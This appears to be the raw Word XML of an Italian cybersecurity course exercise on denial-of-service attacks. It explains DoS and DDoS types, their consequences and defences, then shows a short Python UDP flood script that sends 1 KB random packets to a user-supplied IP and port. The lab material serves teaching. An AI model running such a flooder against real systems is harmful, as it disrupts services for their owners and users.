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ECDBA" w14:textId="06D40424" w:rsidR="002E0C2F" w:rsidRPr="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>S6-L3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F0D0D" w14:textId="59F82AFC" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ATTACCO DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E73D508" w14:textId="757288B8" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve">Introduzione: Gli attacchi di tipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> of Service) mirano a saturare le richieste di determinati servizi, rendendoli così indisponibili e causando significativi impatti sul business delle aziende. Obiettivo dell'Esercizio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A41CBA" w14:textId="76FC7726" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> Scrivere un programma in Python che simuli un UDP flood, ovvero l'invio massivo di richieste UDP verso una macchina target che è in ascolto su una porta UDP casuale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DCA10" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5"/>
    <w:p w14:paraId="760BCD94" w14:textId="536EF2DB" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ATTACCO DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736134A" w14:textId="77777777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Gli attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Service) sono azioni malevole che mirano a rendere un sistema, un servizio o una rete inaccessibili agli utenti legittimi. L'obiettivo è sovraccaricare le risorse di un sistema fino a farlo smettere di funzionare correttamente, bloccando il servizio e causando disagio o danni agli utenti e all'azienda. In ambito di sicurezza informatica, gli attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono particolarmente rilevanti poiché possono portare a gravi interruzioni del servizio e alla perdita di reputazione o di ricavi per le aziende.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608ECAD5" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61083C1F" w14:textId="744D42E8" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipologie di Attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13F75CF0" w14:textId="77777777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Gli attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> possono essere classificati in diverse categorie a seconda delle tecniche utilizzate per provocare l’interruzione del servizio. Tra i principali tipi troviamo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B51757" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254D2845" w14:textId="755B298B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>1. Attacchi di saturazione della larghezza di banda: In questi attacchi, un elevato volume di traffico viene inviato verso un server o una rete, saturando la banda e impedendo il traffico legittimo. Un esempio comune è il **Ping Flood**, in cui una serie di richieste ICMP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) viene inviata al server target in rapida successione, consumando la sua banda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E935E" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76384EBE" w14:textId="019A1E32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>2. Attacchi alle risorse del server: Questi attacchi mirano a sovraccaricare le risorse del server come CPU, memoria o spazio su disco. Ad esempio, l'**attacco SYN Flood** utilizza richieste di connessione TCP incomplete per occupare le risorse di rete, lasciando il server in uno stato in cui non riesce a rispondere alle richieste legittime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6931C7CE" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A4558A" w14:textId="77777777" w:rsid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3. Attacchi applicativi (Layer 7): Questi attacchi colpiscono il livello applicativo, cioè le specifiche funzionalità del servizio (come le API o le pagine web). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB228C" w14:textId="5A0FC2B3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>Un esempio è l’attacco HTTP Flood, dove una quantità enorme di richieste HTTP viene inviata a una pagina web, sovraccaricando il server web fino a provocarne il crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9203D" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3442DB16" w14:textId="590E72CA" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ATTACCHI DDOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5693AA" w14:textId="1A3858E0" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DDoS (Distributed Denial of Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B8984" w14:textId="6D08A444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Una variante più complessa e distruttiva è l'attacco </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, o attacco distribuito di negazione del servizio. In un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, l’attaccante sfrutta una rete di dispositivi compromessi, noti come botnet, per generare un traffico massiccio da molteplici punti di origine, rendendo più difficile difendersi e bloccare l’attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688785F6" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322B15B2" w14:textId="6A4498B5" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">onseguenze degli Attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39EC13A6" w14:textId="77777777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Gli attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> possono avere conseguenze rilevanti per un'azienda o un'organizzazione, tra cui:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA93CF" w14:textId="3C494808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>- Perdita di accesso al servizio: Gli utenti legittimi non riescono ad accedere al servizio, causando insoddisfazione e possibile perdita di clienti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C53123" w14:textId="2448B5A8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- Danno reputazionale: Se un’azienda subisce attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> frequenti, la percezione della sua sicurezza potrebbe risentirne.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAC363" w14:textId="6FA58839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- Perdite finanziarie: I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>downtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e le interruzioni possono tradursi in perdite di vendite e di opportunità commerciali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A26853B" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D20CBA" w14:textId="5B6A351D" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodi di Difesa contro gli Attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F3F071A" w14:textId="77777777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Difendersi da attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> richiede una combinazione di strategie tecniche e operative, tra cui:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50002784" w14:textId="2E8FCD9D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>- Firewall e sistemi di prevenzione delle intrusioni (IPS): Questi strumenti aiutano a rilevare e bloccare il traffico anomalo o sospetto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F8E033" w14:textId="7C5DC896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- Servizi di mitigazione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: Soluzioni come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Akamai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, o AWS Shield possono proteggere il sito filtrando il traffico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BDD7EC" w14:textId="52D3169E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- Rate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>limiting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e controlli di accesso: Limitano il numero di richieste da un singolo indirizzo IP, prevenendo il sovraccarico del server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1158F1" w14:textId="77777777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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F7D7D" w14:textId="508DF815" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">In sintesi, gli attacchi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono una minaccia comune ma dannosa che richiede approcci proattivi e tecnologie avanzate per essere mitigati efficacemente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3CF754" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5"/>
    <w:p w14:paraId="416F8649" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5"/>
    <w:p w14:paraId="32B77B93" w14:textId="28DE0CE7" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ESECUZIONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301DFEF3" w14:textId="2BCEAC5F" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r>
        <w:t>Aiutandoci con chat andiamo a scrivere lo script seguendo le seguenti caratteristiche:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BDC2E" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Requisiti del Programma: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C1083" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t>Input dell'IP Target:  Il programma deve richiedere all'utente di inserire l'IP della macchina target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416AF92" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> Input della Porta Target:  Il programma deve richiedere all'utente di inserire la porta UDP della macchina target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557F7D5" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> Costruzione del Pacchetto:  La grandezza dei pacchetti da inviare deve essere di 1 KB per pacchetto. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0CEE7" w14:textId="77777777" w:rsidR="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t xml:space="preserve"> Suggerimento: per costruire il pacchetto da 1 KB, potete utilizzare il modulo random per la generazione di byte casuali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD218C1" w14:textId="502E50D4" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5">
      <w:r w:rsidRPr="002329C5">
        <w:t>Numero di Pacchetti da Inviare:  Il programma deve chiedere all'utente quanti pacchetti da 1 KB inviare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775355E4" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Testonormale"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BAB92C" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Testonormale"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3BF7F3" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Testonormale"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15684BA1" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Testonormale"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53131492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>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0911EA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>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00EE8F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</w:p>
    <w:p w14:paraId="07CCD8C4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udp_flood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target_ip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target_port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num_packets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58A4917F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# Crea un socket UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E9B1D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sock =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socket.socket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socket.AF_INET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socket.SOCK_DGRAM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A41898A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3F466373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329C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># Crea un pacchetto di 1 KB (1024 byte) con dati casuali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A621769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  <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>packet = random._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urandom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(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028C872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</w:p>
    <w:p w14:paraId="679EAB2F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print(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f"Inizio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UDP flood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su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target_ip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}:{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target_port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}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1A07F5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f"Inviando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num_packets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>} pacchetti da 1 KB ciascuno...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB032B1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</w:p>
    <w:p w14:paraId="5495B7B2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  <w:r w:rsidRPr="002329C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB50A33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    for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num_packets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5254F488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sock.sendto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(packet, (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target_ip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target_port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2035F37A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f"Pacchetto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 xml:space="preserve"> {i + 1} inviato a {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target_ip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>}:{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target_port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>}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA62A4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except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KeyboardInterrupt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F3706D0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    print("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Attacco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interrotto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manualmente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.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D6693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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06250FEA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sock.close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56E036E2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    print("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Attacco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terminato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.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A662C0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</w:p>
    <w:p w14:paraId="74275A1B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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8AF7A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329C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># Richiedi all'utente l'IP della macchina target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30A3ED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target_ip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 xml:space="preserve"> = input("Inserisci l'indirizzo IP della macchina target: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D9550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</w:p>
    <w:p w14:paraId="1125EC37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# Richiedi all'utente la porta UDP della macchina target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E3BEC3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target_port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>(input("Inserisci la porta UDP della macchina target: "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A354E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</w:p>
    <w:p w14:paraId="7A7BAB8D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# Richiedi all'utente il numero di pacchetti da inviare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75714598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num_packets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329C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329C5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(input("Inserisci il numero di pacchetti da inviare: "))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1587BE59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</w:p>
    <w:p w14:paraId="139E25FD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# Avvia la simulazione dell'UDP flood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35242397" w14:textId="77777777" w:rsidR="002329C5" w:rsidRPr="002329C5" w:rsidRDefault="002329C5" w:rsidP="002329C5">
      <w:pPr>
        <w:pStyle w:val="Testonormale"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002329C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udp_flood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target_ip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target_port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329C5">
